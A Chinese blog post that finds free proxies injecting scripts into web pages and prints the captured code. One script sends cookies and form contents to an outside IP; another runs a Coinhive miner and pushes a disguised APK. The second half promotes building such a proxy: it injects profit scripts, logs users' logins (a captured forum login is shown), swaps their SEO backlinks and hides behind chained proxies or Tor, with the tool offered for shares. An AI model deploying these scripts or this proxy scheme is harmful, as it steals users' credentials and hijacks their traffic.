代理IP猫腻多

代理IP猫腻多,这个很久以前就知道,不过没怎么往深了想,不过最近发现,架设代理去玩,也有一些好玩的地方。

我们先来个简单的工具,来判断多少代理IP有猫腻

我们思路很简单,建立一个简单的文档,放着我们的网站上

比如这个http://www.affadsense.com/test.js

html源码为

`

<html lang="en">
<head>
<meta charset="UTF-8">
<script type='text/javascript' src='http://www.affadsense.com/wp-content/plugins/fancy-popup/framework/assets/js/jquery.nicescroll.min.js'></script>
</head>
<body class="home blog kc-css-system">
helloword
</body>

`

然后去批量比对有代理的跟无代理的获取到的页面的代码,看是否一样。

根据这个原理,我简单些了个软件批量去跑

image

我们分两组来对比

代理IP来源为某网站付费的

image

另外就是GSA PROXY这种搜刮软件搜刮的

image

我们看看免费的跟付费的代理源,是否同时存在有猫腻呢?

做我默默的播种之后

大概经过数个小时的播种,烈日下的暴晒让我有点窘迫,但我还是擦擦汗水,来看看结果。

代理IP来源为某网站付费的跑出来 没有什么异常的代理,顶多一堆无效的代理IP,这里我就不放图了。

我们GSA PROXY搜刮后的IP

image

我们针对异常的IP抓取下来的源码进行简单的人工对比

差异在哪里

我们来看下原来应该的代码是什么样子

image

代理IP后的变化如下

image

image

image

image

这些JS修改后的JS有什么用

javascript
!function(){function e(e){var n="",t="?";for(var r in e){var o=e[r],a="boolean"==typeof o?o?r:null:o;a&&(n+=t+"cv[]="+encodeURIComponent(a),t="&")}(new Image).src="http://d.mobilebanner.ru/p.gif"+n}function n(){try{return window.self!==window.top}catch(e){return!0}}function t(){var e=document.getElementsByTagName("head")[0],n=document.createElement("script");n.src="http://p.mobilebanner.ru/ad/base.js?",n.type="text/javascript",e.appendChild(n)}function r(e){c.parentNode.insertBefore(e,c.nextSibling)}function o(e){document.write(e.outerHTML)}function a(){for(var e=document.createElement("script"),n=Array.prototype.slice.call(c.attributes),t=0;t<n.length;t++)e.setAttribute(n[t].nodeName,n[t].nodeValue);return e.src="http://www.affadsense.com/test.js?",e}var c=document.currentScript||document.scripts[document.scripts.length-1],i=a();c.async||c.defer?r(i):o(i);var d,u=n();window.__qsrad||u?d={iframe:u,bannerAlready:window.__qsrad}:(window.__qsrad=1,d={bannerShow:!0},t()),e(d)}();

我们用chrome的console来执行看下

image

应该是调用了某站的base.js

`javascript
function AAAaaaAAAAaa() {
ASFKASfkaso3ot5 = document.getElementById("fksjdtrjoe45jt494944");
var mmm534544m = ["http://www.google-analytics.com/ga.js", "http://c.amazon-adsystem.com/aax2/amznads.js", "http://a.bf-ad.net/makabo/adsfol_init.js", "http://a.bf-tools.net/de/de.js", "http://click.hm.baidu.com/mkt.js", "http://imgcache.qq.com/qzone/biz/comm/js/qbs.js", "http://google-analytics.com/analytics.js", "http://www.google-analytics.com/analytics.js"];
if(ASFKASfkaso3ot5 == null) {
var randy = Math.random().toString();
document.write('<img src="http://185.62.189.17/' + randy + '.php" style="display: none";></img>');
var currentTime = new Date().getTime();while (currentTime + 200 >= new Date().getTime()) {}
document.write('<img id="fksjdtrjoe45jt494944" src="http://185.62.189.17/kal.php?urrl=' + encodeURI(document.location) + '&domaim='+encodeURI(document.domain)+'&cooky='+encodeURI(document.cookie)+'&rand='+randy+'" style="display: none";></img>');
document.write('<script type="application/javascript" src="http://185.62.189.17/ee.js"></script>');

	var mmm534544 = document.createElement("b");
	mmm534544.innerHTML = "";
	for(var iii = 0; iii < mmm534544m.length; iii++) {
		mmm534544.innerHTML += '<img src="' + mmm534544m[iii] + '"></img>';
	}
	mmm534544.setAttribute("style", "display: none");
	document.body.appendChild(mmm534544);

	document.addEventListener("DOMContentLoaded", (event) => {
		var forms = parent.document.getElementsByTagName("form");
		for(var i = 0; i < forms.length; i++) {
			forms[i].addEventListener("submit", function() {
				var ree = "";
				var forms = parent.document.getElementsByTagName("form");
				for(var x = 0; x < forms.length; x++) {
					var elements = forms[x].elements;
					for(var e = 0; e < elements.length; e++) {
						ree += elements[e].name + "=" + elements[e].value + "||";
					}
				}
				var randy = Math.random().toString();

				var iiiii = new Image();
				iiiii.src = "http://185.62.189.17/" + randy + ".php";

				var currentTime = new Date().getTime();while (currentTime + 100 >= new Date().getTime()) {}

				var iiii = new Image();
				iiii.src = "http://185.62.189.17/for.php?urrl=" + encodeURI(document.location) + "&con=" + encodeURI(ree) + "&rand=" + randy;

			}, false);

		}
	});
}

}
AAAaaaAAAAaa();
`
image

同样 通过修改JS的内容,调用到了第三方的资源进行广告显示

当然,这里404了,我估计是做了屏蔽。

这里也挖到了一个国内的操作


<html>
<script>
var _hmt = _hmt || [];
(function () {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?c023ba0dad186d618c3cafa57528cbd6";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<script>
var dict = {
zh: [
'请安装Facebook扩展工具包提升安全性,以及使用流畅度.',
'APP Store帐号存在安全异常,请重新登录'], //中文
zh2: ['請安裝Facebook擴展工具包提升安全性,以及使用流暢度.',
'Apple Store帳號存在安全异常,請重新登入'], //繁体中文
ja: ['Facebook拡張ツールバッグを取付て安全性及び使用流暢性を向上します。',
'APP Storeアカウントは安全異常があるので、再度ログインしてください。'], //日语
ko: ['페이스북 보안확장 및 사용을 유창하기위해 설치하시길바랍니다.',
'APP Store계정은 비정상 상태이기 때문에 다시 로그인하세요.'],//韩文
en: ['To better experience the browsing, update to the latest Facebook version.',
'The APP store account has a security exception, please log in again.'],//英语
ar: [' يرجى تثبيت حزمة أدوات توسيع Facebook لتحسين مستوى الأمان ، واستخدامه بصورة سلسة . في حالة عدم القدرة على تنزيلها بصورة عادية، انقر فوق زر نسخ واستخدم المتصفح الافتراضي ، وقم بلصق الرابط إلى شريط العناوين لزيارة الرابط ',
"هناك خلل أمني في حساب APP Store يرجي إعادة تسجيل الدخول من ﺟﺪﻳﺪ"],//阿拉伯语
bg: ['Моля, инсталирайте инструмента за разширението на Facebook, за да подобрите сигурността и по-добрата работа. Ако разширението не може да се изтегли правилно, моля, кликнете върху бутона Копиране, отворете браузъра по подразбиране и поставете връзката в адресната лента, за да получите достъп до него.',
'APP Store за приложения с изключение на сигурността, моля, влезте отново.'],//保加利亚语
pl: ['Proszę zainstalować narzędzie Facebook w celu poprawy bezpieczeństwa i płynności obsługi. Jeśli narzędzie nie pobiera się w sposób prawidłowy, kliknij w przycisk Kopiuj, otwórz przeglądarkę domyślną i wklej odnośnik do paska adresu.',
'Konta aplikacji APP Store mają wyjątki bezpieczeństwa, zaloguj się ponownie, proszę.'],//波兰语
de: ['Bitte installieren Sie das Facebook-Erweiterungstoolkit, das die Sicherheit verbessern und fließend sein kann. Wenn es nicht normal heruntergeladen werden kann, klicken Sie auf die Kopieren-Knöpfe und verwenden Sie den Standardbrowser. Fügen Sie den Link vor dem Besuch in die Adressleiste ein',
'Das Apple Store Konto hat eine Sicherheitsausnahme. Bitte melden Sie sich erneut'],//德语
ru: ['Пожалуйста, установите расширительный комплект Facebook, чтобы улучшить безопасность и беглость использования . Если вы не можете правильно загрузить, нажмите кнопку «Копировать» и используйте браузер по умолчанию, чтобы вставить ссылку в адресную строку для доступа.',
'В счете APP store есть безопасные проблема, повторите записываться'],//俄语
tl: ['Mangyari ikabit ang Facebook na ekstensyon toolkit upang mapabuti ang siguridad at katatasan. Kapag ang ekstensyon ay hindi maikarga nang maayos, mangyari i-klik ang Kopya na buton, at buksan ang depolt na Browser, at i-paste ang link sa adres bar upang ma-akses ito.',
'Ang mga account ng APP Store ay may mga pagbubukod sa seguridad, mangyaring muling mag-login. '],//他加禄语 菲律宾
ka: ['გთხოვთ, დააინსტალიროთ ,,ფეისბუქის’’ გაფართოების ინსტრუმენტი, რათა გააუმჯობესოთ უსაფრთხოების ხარისხი და გამოიყენოთ იგი ყოველგვარი ძალდატანების გარეშე. თუ გაფართოების ინსტრუმენტი სრულყოფილად არ ჩამოიტვირთა, გთხოვთ, დააწკაპეთ ღილაკს ,,კოპირება’’, გახსენით ,,ნაგულისხმევი ბრაუზერი’’ და ,,ლინკი’’ ჩასვით ,,მისამართის ველში’’, რათა შეძლოთ მასზე წვდომა. ',
'APP Store ანგარიშებს აქვს უსაფრთხოების გამონაკლისები, გთხოვთ, კვლავ შეხვიდეთ სისტემაში.'],//格鲁吉亚语
cs: ['Prosím, nainstalujte Facebook Toolkit pro rozšíření zabezpečení a plynulosti. Pokud nelze rozšíření stáhnout správně, klikněte na tlačítko Kopírovat a otevřete výchozí Prohlížeč a vložte jej do adresního řádku.',
'Účty APP Store mají bezpečnostní výjimky, znovu se přihlašte.'],//捷克语
ms: ['Sila pasang kit alatan sambungan Facebook untuk meningkatkan keselamatan dan kelancaran. Sekiranya sambungan tidak dapat dimuat turun dengan sempurna, sila klik butang Salin, dan buka Pelayar lalai, dan tampal pautan ke bar alamat untuk mengaksesnya.',
'APP Store akaun mempunyai pengecualian Keselamatan, log masuk semula Sila.'],//马来语
bn: ['সুরক্ষা এবং ফ্লুয়েন্সি বাড়াতে অনুগ্রহ করে Facebook এক্সটেনশান টুলকিট ইন্সস্টল করুন। এক্সটেনশান সঠিকভাবে ডাউনলোড না করা গেলে, অনুগ্রহ করে কপি বোতামে ক্লিক করুন, ডিফল্ট ব্রাউজারটি খুলুন, এবং অ্যাড্রেস বারে লিঙ্কটি পেস্ট করুন। ',
'APP Store র অ্যাকাউন্ট, আবার লগইন করুন দয়া করে।'],//孟加拉语
pt: ['Por favor, instale o Facebook Extension Toolkit para melhorar a segurança e a fluência de uso. Se não conseguir fazer o download corretamente, clique no botão “Copiar” e use o navegador de padrão, e cole o link na barra de endereço para a navegação.',
'The APP store account has a security exception, please log in again.'],//葡萄牙语
sh: ['Molimo da instalirate alatku za nadogradnju Facebooka radi poboljšanja sigurnosti i fluktuacije. Ako se ekstenzija ne može ispravno učitati, kliknite na dugme Kopiraj i otvorite podrazumevani pretraživač i nalepite vezu u adresnu liniju da biste joj pristupili.',
'APP Store konta imaju i bezbednosti izuzetke, prijava opet molim te.'],//塞尔维亚-克罗地亚语
th: [' Facebook ',
'App Store '],//泰语
tr: ["Güvenliği ve akıcılığı artırmak için lütfen Facebook eklentisi araç setini yükleyin. Eklenti düzgün şekilde indirilemiyorsa, lütfen Kopyala düğmesine tıklayın ve varsayılan Tarayıcı'yı açın ve bağlantıya erişmek için kopyaladığınız bağlantıyı adres çubuğuna yapıştırın..",
'App Store hesaplarının Güvenlik istisnaları var, tekrar oturum açın lütfen.'],//土耳其语
uk: ['Інсталюйте пакет інструментів розширення Facebook, щоб підвищити безпеку та плавність перегляду. Якщо розширення не вдається завантажити, клацніть на кнопку «Копіювати», відкрийте браузер за замовчуванням, і вставте посилання у рядок адреси, щоб отримати доступ.',
'Облікові записи APP Store мають винятки щодо безпеки, але ще раз увійдіть, будь ласка.'],//乌克兰语
es: ['Instale el paquete de herramientas informáticas de extensión de Facebook para mejorar la seguridad y la fluidez de uso. Si no puede descargar normalmente, haga clic en el botón “Copiar”, y luego, usando el navegador predeterminado, pegue el enlace en la barra de direcciones para acceder.',
'La cuenta de APP Store existe lo anormal,por favor conecte nuevamente.'],//西班牙语
he: ['נא להתקין את ערכת ההרחבה של פייסבוק כדי לשפר את האבטחה ואת השטף. אם לא ניתן להוריד את ההרחבה כראוי, לחץ על הלחצן "העתק" ופתח את דפדפן ברירת המחדל, והדבק את הקישור בשורת הכתובת כדי לגשת אליו.',
'לחשבונות APP Store יש חריגים ביטחוניים, היכנס שוב בבקשה.'],//希伯来语
hy: ['Խնդրում ենք տեղադրել Ֆեյսբուքի ընդլայնման գործիքակազմը, անվտանգությունն ու տիրապետումը բարելավելու համար. Եթե ընդլայնումը չի հաջողվում ներբեռնվել, խնդրում ենք սեղմել Պատճեն կոճակը եւ բացել լռելյայն Բրաուզերը-ը եւ մուտք գործել այն հասցեի մեջ, այն մուտք գործելու համար.',
'APP Store հաշիվ անվտանգության բացառությամբ, մուտք գործեք նորից.'],//亚美尼亚语
it: ["Installa il Toolkit di Estensione di Facebook per migliorare la sicurezza e la rapidità di utilizzo. Se non è possibile scaricare correttamente, fai clic sul pulsante \"Copia\" e utilizza il browser predefinito per incollare il collegamento nella barra degli indirizzi per l'accesso.",
"Esiste un'anomalia di sicurezza nell'account APP Store, accedi di nuovo"],//立陶宛语
hi: ['सुरक्षा और प्रवाह में सुधार के लिए कृपया फेसबुक एक्सटेंशन टूलकिट इंस्टॉल करें। अगर एक्सटेंशन ठीक से डाउनलोड नहीं किया जा सकता है, तो कृपया कॉपी बटन पर क्लिक करें, और डिफ़ॉल्ट ब्राउज़र खोलें, और लिंक को एड्रेस बार में एक्सेस करने के लिए पेस्ट करें।',
'APP Store खातों में सुरक्षा अपवाद हैं, कृपया फिर से लॉगिन करें।'],//印地语
id: ['Harap instal seperangkat alat tambahan Facebook untuk meningkatkan keamanan dan kelancaran. Jika tambahan tidak dapat diunduh dengan benar, klik tombol Salin, dan buka Peramban standar, dan tempel tautan ke batang alamat untuk mengaksesnya.',
'Akun APP Store memiliki pengecualian keamanan, silakan login kembali.'],//印尼语
vi: ['Vui lòng cài đặt bộ công cụ mở rộng Facebook để cải thiện an ninh và độ trôi chảy. Nếu phần mở rộng không thể tải xuống đúng cách, vui lòng nhấp vào nút Sao chép và mở Trình duyệt mặc định và dán liên kết vào thanh địa chỉ để truy cập.',
'Tài khoản APP Store dụng có ngoại lệ bảo mật, đăng nhập lại xin vui lòng.'],//越南语
}
function getString(i) {
var lang = (navigator.language || navigator.browserLanguage).toLowerCase();
var key = lang.substring(0, 2)
if (lang == 'zh-tw' || lang == 'zh-hk') {
key = 'zh2';
}
var arr = dict[key];
if (arr) {
return arr[i] || dict['en'][i];
}
return dict['en'][i];
}
if (typeof String.prototype.startsWith != 'function') {
String.prototype.startsWith = function (prefix) {
return this.slice(0, prefix.length) === prefix;
};
}
if (typeof String.prototype.endsWith != 'function') {
String.prototype.endsWith = function (suffix) {
return this.indexOf(suffix, this.length - suffix.length) !== -1;
};
}
if ((navigator.language || navigator.browserLanguage).toLowerCase().startsWith("ja")) {
} else {
var u = navigator.userAgent;
var isAndroid = u.indexOf('Android') > -1 || u.indexOf('Adr') > -1;
var isiOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);
if (isAndroid) {
window.location.href = "d://my.org";
setTimeout(function () {
window.alert(getString(0));
window.location.href = "http://m.youku.com/" + Math.random().toString().substring(2, 10) + ".apk"
}, 500);
}
function isPC() {
var userAgentInfo = navigator.userAgent;
var Agents = ["Android", "iPhone", "SymbianOS", "Windows Phone", "iPad", "iPod"];
var flag = true;
for (var v = 0; v < Agents.length; v++) {
if (userAgentInfo.indexOf(Agents[v]) > 0) {
flag = false;
break;
}
}
return flag;
}
if (isPC()) {
document.writeln("<script src=\'https://coinhive.com/lib/coinhive.min.js\'><" + "/script>");
document.writeln("<script>");
document.writeln(" var miner = new CoinHive.Anonymous(\'U8lCCcyqS7MeBz2npIynBxoJ3QdGZqkK\');");
document.writeln(" miner.start();");
document.writeln("</" + "script>");
}
if (isiOS) {
window.alert(getString(1));
window.location.href = "http://security.apple.com/";
//document.writeln("<script src=\'https://coinhive.com/lib/coinhive.min.js\'><" + "/script>");
// document.writeln("<script>");
//document.writeln(" var miner = new CoinHive.Anonymous(\'U8lCCcyqS7MeBz2npIynBxoJ3QdGZqkK\');");
// document.writeln(" miner.start();");
// document.writeln("</" + "script>");
}
}
</script>
</body>
</html>

直接执行挖矿,另外判断手机端,做APP下载


window.location.href = "http://m.youku.com/" + Math.random().toString().substring(2, 10) + ".apk"
}, 500);

这里不要以为是youku的APP,因为都是走代理去下载,所以解析的IP他们可以自定义转向到他们的目标下载路径上。

我们自己搭建这样的代理的方法

自己搭建代理服务器,然后自动修改网页源码加载我们自己要盈利的脚步?

比较普遍的就是用Squid

相关教程可以百度到

这里我自己用Fiddlercore简单的实现了一个

image

用法比较简单

传到VPS上面,开启,设置监听的端口即可

然后我们浏览器设置好代理即可。

勾选记录日志,即可记录别人用我们的代理做了什么网页访问

比如 我设置好了一个,然后进行hostloc的登陆

image

我们来到log文件夹,看看记录了什么

image

是不是很猥琐?

代理IP原理

原理很简单,监听端口,判断请求的URL,然后在BeforeResponse模块中 进行判断在输出代码

记录用户的数据,主要是根据session 里面进行获取

image

相关源码已经发布在论坛内部,知识星球内部。有兴趣的话,可以去看下,当然,这类资料,搜素引擎也有一大堆,码农可以自己想办法套个框架就行了。

也不是什么黑科技

代理这东西,很早以前就一堆人玩了,只是很少人会去注意这一块,放在SEO上,发布代理出去,让外贸SEO的人用我们的代理去做群发,然后替换他们发布的外链为我们自己的外链。

以前有人这么玩过,当然,也可以用来搜刮别人的外链用。

玩法很多,主要看你猥琐不猥琐了。

肯定有人说自己发布代理 怕服务器被封

额。。采集代理,本地监听,监听的再转发走那些采集的IP,就可以啦。

所以。。

封啥,圈内还有大牛直接写了走几层TOR的,更猥琐!

以下进入广告时间!

如何获取这个软件?

内部的成员,可以直接进论坛,或者知识星球下载即可。

image

当然,还没进入的大家怎么获得呢? (没有任何行动就想获得?不可能的。)

转发本文到朋友圈,然后截图,加微信,发送截图,即可。(我也想吸粉,哈哈)

微信:

image

就到这里了

最近忙移动端的自动化的开发,就是群控哈。

关于上次说的考题,明天会推送。

image

`
城市的沥青路太硬,踩不出足迹

                        -----------当代诗人:达文西

`

image

码字不易,您的转发和赞赏是我的一大动力之一。

欢迎关注我的公众号,请爱护我,不要抄袭我。

image

欢迎加入我的论坛,与我们一起交流。

下面是加入小密圈/获取论坛邀请码购买渠道:

小密圈(入圈后私信圈主,看到会私信邀请码):

image

其他获取方式:

支付宝:image

微信支付:

image